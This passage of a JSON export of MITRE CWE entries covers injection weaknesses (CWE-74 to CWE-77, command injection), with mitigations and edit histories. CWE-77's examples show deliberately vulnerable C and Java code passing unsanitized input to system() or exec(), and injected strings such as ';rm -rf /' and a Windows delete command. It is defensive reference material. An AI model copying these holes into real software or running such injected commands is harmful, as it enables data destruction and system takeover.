vulnerabilities.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"707","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Primary"}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."}]},"Likelihood_Of_Exploit":"High","Common_Consequences":{"Consequence":[{"Scope":"Confidentiality","Impact":"Read Application Data","Note":"Many injection attacks involve the disclosure of important information -- in terms of both data sensitivity and usefulness in further exploitation."},{"Scope":"Access Control","Impact":"Bypass Protection Mechanism","Note":"In some cases, injectable code controls authentication; this may lead to a remote vulnerability."},{"Scope":"Other","Impact":"Alter Execution Logic","Note":"Injection attacks are characterized by the ability to significantly change the flow of a given process, and in some cases, to the execution of arbitrary code."},{"Scope":["Integrity","Other"],"Impact":"Other","Note":"Data injection attacks lead to loss of data integrity in nearly all cases as the control-plane data injected is always incidental to data recall or writing."},{"Scope":"Non-Repudiation","Impact":"Hide Activities","Note":"Often the actions performed by injected control code are unlogged."}]},"Potential_Mitigations":{"Mitigation":[{"Phase":"Requirements","Description":"Programming languages and supporting technologies might be chosen which are not subject to these issues."},{"Phase":"Implementation","Description":"Utilize an appropriate mix of allowlist and denylist parsing to filter control-plane syntax from all input."}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"CLASP"},"Entry_Name":"Injection problem (\'data\' used as something else)"},{"attr":{"@_Taxonomy_Name":"OWASP Top Ten 2004"},"Entry_ID":"A6","Entry_Name":"Injection Flaws","Mapping_Fit":"CWE More Specific"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP24","Entry_Name":"Tainted input to command"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"10"}},{"attr":{"@_CAPEC_ID":"101"}},{"attr":{"@_CAPEC_ID":"108"}},{"attr":{"@_CAPEC_ID":"120"}},{"attr":{"@_CAPEC_ID":"13"}},{"attr":{"@_CAPEC_ID":"135"}},{"attr":{"@_CAPEC_ID":"14"}},{"attr":{"@_CAPEC_ID":"24"}},{"attr":{"@_CAPEC_ID":"250"}},{"attr":{"@_CAPEC_ID":"267"}},{"attr":{"@_CAPEC_ID":"273"}},{"attr":{"@_CAPEC_ID":"28"}},{"attr":{"@_CAPEC_ID":"3"}},{"attr":{"@_CAPEC_ID":"34"}},{"attr":{"@_CAPEC_ID":"42"}},{"attr":{"@_CAPEC_ID":"43"}},{"attr":{"@_CAPEC_ID":"45"}},{"attr":{"@_CAPEC_ID":"46"}},{"attr":{"@_CAPEC_ID":"47"}},{"attr":{"@_CAPEC_ID":"51"}},{"attr":{"@_CAPEC_ID":"52"}},{"attr":{"@_CAPEC_ID":"53"}},{"attr":{"@_CAPEC_ID":"6"}},{"attr":{"@_CAPEC_ID":"64"}},{"attr":{"@_CAPEC_ID":"67"}},{"attr":{"@_CAPEC_ID":"7"}},{"attr":{"@_CAPEC_ID":"71"}},{"attr":{"@_CAPEC_ID":"72"}},{"attr":{"@_CAPEC_ID":"76"}},{"attr":{"@_CAPEC_ID":"78"}},{"attr":{"@_CAPEC_ID":"79"}},{"attr":{"@_CAPEC_ID":"8"}},{"attr":{"@_CAPEC_ID":"80"}},{"attr":{"@_CAPEC_ID":"83"}},{"attr":{"@_CAPEC_ID":"84"}},{"attr":{"@_CAPEC_ID":"9"}}]},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-18"}}},"Notes":{"Note":{"#text":"Many people treat injection only as an input validation problem (CWE-20) because many people do not distinguish between the consequence/attack (injection) and the protection mechanism that prevents the attack from succeeding. However, input validation is only one potential protection mechanism (output encoding is another), and there is a chaining relationship between improper input validation and the improper enforcement of the structure of messages to other components. Other issues not directly related to input validation, such as race conditions, could similarly impact message structure.","attr":{"@_Type":"Theoretical"}}},"Content_History":{"Submission":{"Submission_Name":"CLASP","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Organization":"Veracode","Modification_Date":"2008-08-15","Modification_Comment":"Suggested OWASP Top Ten 2004 mapping"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Common_Consequences, Description, Relationships, Other_Notes, Relationship_Notes, Taxonomy_Mappings, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-01-12","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Name, Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Description, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-04-05","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Description, Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Common_Consequences, Relationship_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-02-18","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2015-12-07","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-01-19","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-05-03","Modification_Comment":"updated Potential_Mitigations, Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Causal_Nature, Likelihood_of_Exploit, Modes_of_Introduction, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-03-27","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated References, Relationship_Notes, Relationships, Theoretical_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Related_Attack_Patterns, Relationships"}],"Previous_Entry_Name":[{"#text":"Injection","attr":{"@_Date":"2008-04-11"}},{"#text":"Failure to Sanitize Data into a Different Plane (aka \'Injection\')","attr":{"@_Date":"2009-05-27"}},{"#text":"Failure to Sanitize Data into a Different Plane (\'Injection\')","attr":{"@_Date":"2010-06-21"}}]}},"75":{"attr":{"@_ID":"75","@_Name":"Failure to Sanitize Special Elements into a Different Plane (Special Element Injection)","@_Abstraction":"Class","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software does not adequately filter user-controlled input for special elements with control implications.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"74","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."}]},"Common_Consequences":{"Consequence":{"Scope":["Integrity","Confidentiality","Availability"],"Impact":["Modify Application Data","Execute Unauthorized Code or Commands"]}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Requirements","Description":"Programming languages and supporting technologies might be chosen which are not subject to these issues."},{"Phase":"Implementation","Description":"Utilize an appropriate mix of allowlist and denylist parsing to filter special element syntax from all input."}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Special Element Injection"}},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"81"}},{"attr":{"@_CAPEC_ID":"93"}}]},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-05-03","Modification_Comment":"updated Potential_Mitigations, Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Modes_of_Introduction, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Potential_Mitigations"}],"Previous_Entry_Name":{"#text":"Special Element Injection","attr":{"@_Date":"2008-04-11"}}}},"76":{"attr":{"@_ID":"76","@_Name":"Improper Neutralization of Equivalent Special Elements","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software properly neutralizes certain special elements, but it improperly neutralizes equivalent special elements.","Extended_Description":"The software may have a fixed list of special characters it believes is complete. However, there may be alternate encodings, or representations that also have the same meaning. For example, the software may filter out a leading slash (/) to prevent absolute path names, but does not account for a tilde (~) followed by a user name, which on some *nix systems could be expanded to an absolute pathname. Alternately, the software might filter a dangerous \\"-e\\" command-line switch when calling an external program, but it might not account for \\"--exec\\" or other switches that have the same semantics.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"75","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Primary"}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."}]},"Likelihood_Of_Exploit":"High","Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Other"}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Requirements","Description":"Programming languages and supporting technologies might be chosen which are not subject to these issues."},{"Phase":"Implementation","Description":"Utilize an appropriate mix of allowlist and denylist parsing to filter equivalent special element syntax from all input."}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Equivalent Special Element Injection"}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes, Taxonomy_Mappings, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Description, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Description, Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-05-03","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Causal_Nature, Likelihood_of_Exploit, Modes_of_Introduction, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Potential_Mitigations"}],"Previous_Entry_Name":[{"#text":"Equivalent Special Element Injection","attr":{"@_Date":"2008-04-11"}},{"#text":"Failure to Resolve Equivalent Special Elements into a Different Plane","attr":{"@_Date":"2010-06-21"}}]}},"77":{"attr":{"@_ID":"77","@_Name":"Improper Neutralization of Special Elements used in a Command (\'Command Injection\')","@_Abstraction":"Class","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software constructs all or part of a command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended command when it is sent to a downstream component.","Extended_Description":{"xhtml:p":["Command injection vulnerabilities typically occur when:","Many protocols and products have their own custom command language. While OS or shell command strings are frequently discovered and targeted, developers may not realize that these other command languages might also be vulnerable to attacks.","Command injection is a common problem with wrapper programs."],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["1. Data enters the application from an untrusted source.","2. The data is part of a string that is executed as a command by the application.","3. By executing the command, the application gives an attacker a privilege or capability that the attacker would not otherwise have."]}},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"74","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"74","@_View_ID":"1003","@_Ordinal":"Primary"}}]},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Primary"}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."}]},"Likelihood_Of_Exploit":"High","Common_Consequences":{"Consequence":{"Scope":["Integrity","Confidentiality","Availability"],"Impact":"Execute Unauthorized Code or Commands","Note":"If a malicious user injects a character (such as a semi-colon) that delimits the end of one command and the beginning of another, it may be possible to then insert an entirely new and unrelated command that was not intended to be executed."}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Description":"If at all possible, use library calls rather than external processes to recreate the desired functionality."},{"Phase":"Implementation","Description":"If possible, ensure that all external commands called from the program are statically created."},{"attr":{"@_Mitigation_ID":"MIT-5"},"Phase":"Implementation","Strategy":"Input Validation","Description":{"xhtml:p":["Assume all input is malicious. Use an \\"accept known good\\" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.","When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, \\"boat\\" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as \\"red\\" or \\"blue.\\"","Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code\'s environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright."]}},{"Phase":"Operation","Description":"Run time: Run time policy enforcement may be used in an allowlist fashion to prevent use of any non-sanctioned commands."},{"Phase":"System Configuration","Description":"Assign permissions to the software system that prevents the user from accessing/opening privileged files."}]},"Demonstrative_Examples":{"Demonstrative_Example":[{"attr":{"@_Demonstrative_Example_ID":"DX-30"},"Intro_Text":"The following simple program accepts a filename as a command line argument and displays the contents of the file back to the user. The program is installed setuid root because it is intended for use as a learning tool to allow system administrators in-training to inspect privileged system files without giving them the ability to modify them or damage the system.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"int main(int argc, char** argv) {}","xhtml:div":{"#text":"char cmd[CMD_MAX] = \\"/usr/bin/cat \\";strcat(cmd, argv[1]);system(cmd);","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["",""]}}},"Body_Text":["Because the program runs with root privileges, the call to system() also executes with root privileges. If a user specifies a standard filename, the call works as expected. However, if an attacker passes a string of the form \\";rm -rf /\\", then the call to system() fails to execute cat due to a lack of arguments and then plows on to recursively delete the contents of the root partition.","Note that if argv[1] is a very long argument, then this issue might also be subject to a buffer overflow (CWE-120)."]},{"attr":{"@_Demonstrative_Example_ID":"DX-28"},"Intro_Text":"The following code is from an administrative web application designed to allow users to kick off a backup of an Oracle database using a batch-file wrapper around the rman utility and then run a cleanup.bat script to delete some temporary files. The script rmanDB.bat accepts a single command line parameter, which specifies what type of backup to perform. Because access to the database is restricted, the application runs the backup as a privileged user.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"...String btype = request.getParameter(\\"backuptype\\");String cmd = new String(\\"cmd.exe /K \\\\\\"System.Runtime.getRuntime().exec(cmd);...","xhtml:br":["","","",""],"xhtml:div":{"#text":"c:\\\\\\\\util\\\\\\\\rmanDB.bat \\"+btype+\\"&&c:\\\\\\\\utl\\\\\\\\cleanup.bat\\\\\\"\\")","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["",""]}}},"Body_Text":"The problem here is that the program does not do any validation on the backuptype parameter read from the user. Typically the Runtime.exec() function will not execute multiple commands, but in this case the program first runs the cmd.exe shell in order to run multiple commands with a single call to Runtime.exec(). Once the shell is invoked, it will happily execute multiple commands separated by two ampersands. If an attacker passes a string of the form \\"& del c:\\\\\\\\dbms\\\\\\\\*.*\\", then the application will execute this command along with the others specified by the program. Because of the nature of the application, it runs with the privileges necessary to interact with the database, which means whatever command the attacker injects will run with those privileges as well."},{"Intro_Text":"The following code from a system utility uses the system property APPHOME to determine the directory in which it is installed and then executes an initialization script based on a relative path from the specified directory.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"...String home = System.getProperty(\\"APPHOME\\");String cmd = home + INITCMD;java.lang.Runtime.getRuntime().exec(cmd);...","xhtml:br":["","","",""]}},"Body_Text":"The code above allows an attacker to execute arbitrary commands with the elevated privilege of the application by modifying the system property APPHOME to point to a different path containing a malicious version of INITCMD. Because the program does not validate the value read from the environment, if an attacker can control the value of the system property APPHOME, then they can fool the application into running malicious code and take control of the system."},{"Intro_Text":"The following code is a wrapper around the UNIX command cat which prints the contents of a file to standard out. It is also injectable:","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"#include <stdio.h>#include <unistd.h>int main(int argc, char **argv) {}","xhtml:br":["","",""],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"char cat[] = \\"cat \\";char *command;size_t commandLength;commandLength = strlen(cat) + strlen(argv[1]) + 1;command = (char *) malloc(commandLength);strncpy(command, cat, commandLength);strncat(command, argv[1], (commandLength - strlen(cat)) );system(command);return (0);","xhtml:br":["","","","","","","","","","",""]}}}},{"attr":{"@_Nature":"informative"},"xhtml:div":{"#text":"$ ./catWrapper Story.txtWhen last we left our heroes...","xhtml:br":""}},{"attr":{"@_Nature":"attack"},"xhtml:div":{"#text":"$ ./catWrapper Story.txt; lsWhen last we left our heroes...Story.txtSensitiveFile.txtPrivateData.dba.out*","xhtml:br":["","","","",""]}}],"Body_Text":["Used normally, the output is simply the contents of the file requested:","However, if we add a semicolon and another command to the end of this line, the command is executed by catWrapper with no complaint:","If catWrapper had been set to have a higher privilege level than the standard user, arbitrary commands could be executed with that higher privilege."]}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-1999-0067","Description":"Canonical example of OS command injection. CGI program does not neutralize \\"|\\" metacharacter when invoking a phonebook program.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0067"},{"Reference":"CVE-2019-12921","Description":"image program allows injection of commands in \\"Magick Vector Graphics (MVG)\\" language.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12921"},{"Reference":"CVE-2020-11698","Description":"anti-spam product allows injection of SNMP commands into confiuration file","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-11698"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"7 Pernicious Kingdoms"},"Entry_Name":"Command Injection"},{"attr":{"@_Taxonomy_Name":"CLASP"},"Entry_Name":"Command injection"},{"attr":{"@_Taxonomy_Name":"OWASP Top Ten 2007"},"Entry_ID":"A2","Entry_Name":"Injection Flaws","Mapping_Fit":"CWE More Specific"},{"attr":{"@_Taxonomy_Name":"OWASP Top Ten 2004"},"Entry_ID":"A1","Entry_Name":"Unvalidated Input","Mapping_Fit":"CWE More Specific"},{"attr":{"@_Taxonomy_Name":"OWASP Top Ten 2004"},"Entry_ID":"A6","Entry_Name":"Injection Flaws","Mapping_Fit":"CWE More Specific"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP24","Entry_Name":"Tainted input to command"},{"attr":{"@_Taxonomy_Name":"SEI CERT Perl Coding Standard"},"Entry_ID":"IDS34-PL","Entry_Name":"Do not pass untrusted, unsanitized data to a command interpreter","Mapping_Fit":"CWE More Specific"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"136"}},{"attr":{"@_CAPEC_ID":"15"}},{"attr":{"@_CAPEC_ID":"183"}},{"attr":{"@_CAPEC_ID":"248"}},{"attr":{"@_CAPEC_ID":"40"}},{"attr":{"@_CAPEC_ID":"43"}},{"attr":{"@_CAPEC_ID":"75"}},{"attr":{"@_CAPEC_ID":"76"}}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-6"}},{"attr":{"@_External_Reference_ID":"REF-140"}},{"attr":{"@_External_Reference_ID":"REF-44","@_Section":""Sin 10: Command Injection." Page 171"}}]},"Notes":{"Note":{"attr":{"@_Type":"Terminology"},"xhtml:p":["The \\"command injection\\" phrase carries different meanings to different people. For some people, it refers to refers to any type of attack that can allow the attacker to execute commands of their own choosing, regardless of how those commands are inserted. The command injection could thus be resultant from another weakness. This usage also includes cases in which the functionality allows the user to specify an entire command, which is then executed; within CWE, this situation might be better regarded as an authorization problem (since an attacker should not be able to specify arbitrary commands.)","Another common usage, which includes CWE-77 and its descendants, involves cases in which the attacker injects separators into the command being constructed."]}},"Content_History":{"Submission":{"Submission_Name":"7 Pernicious Kingdoms","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Organization":"Veracode","Modification_Date":"2008-08-15","Modification_Comment":"Suggested OWASP Top Ten 2004 mapping"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Common_Consequences, Relationships, Other_Notes, Taxonomy_Mappings, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Demonstrative_Examples, Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Demonstrative_Examples, Description, Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Common_Consequences, Description, Other_Notes, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Description, Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Common_Consequences, Demonstrative_Examples, References, Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-02-21","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-07-17","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-02-18","Modification_Comment":"updated Applicable_Platforms, Demonstrative_Examples, Description, Other_Notes, Terminology_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2015-12-07","Modification_Comment":"updated Demonstrative_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-05-03","Modification_Comment":"updated Potential_Mitigations, Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Causal_Nature, Likelihood_of_Exploit, Modes_of_Introduction, References, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-03-27","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Potential_Mitigations, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Description, Observed_Examples, Relationships"}],"Previous_Entry_Name":[{"#text":"Command Injection","attr":{"@_Date":"2008-04-11"}},{"#text":"Failure to Sanitize Data into a Control Plane (aka \'Command 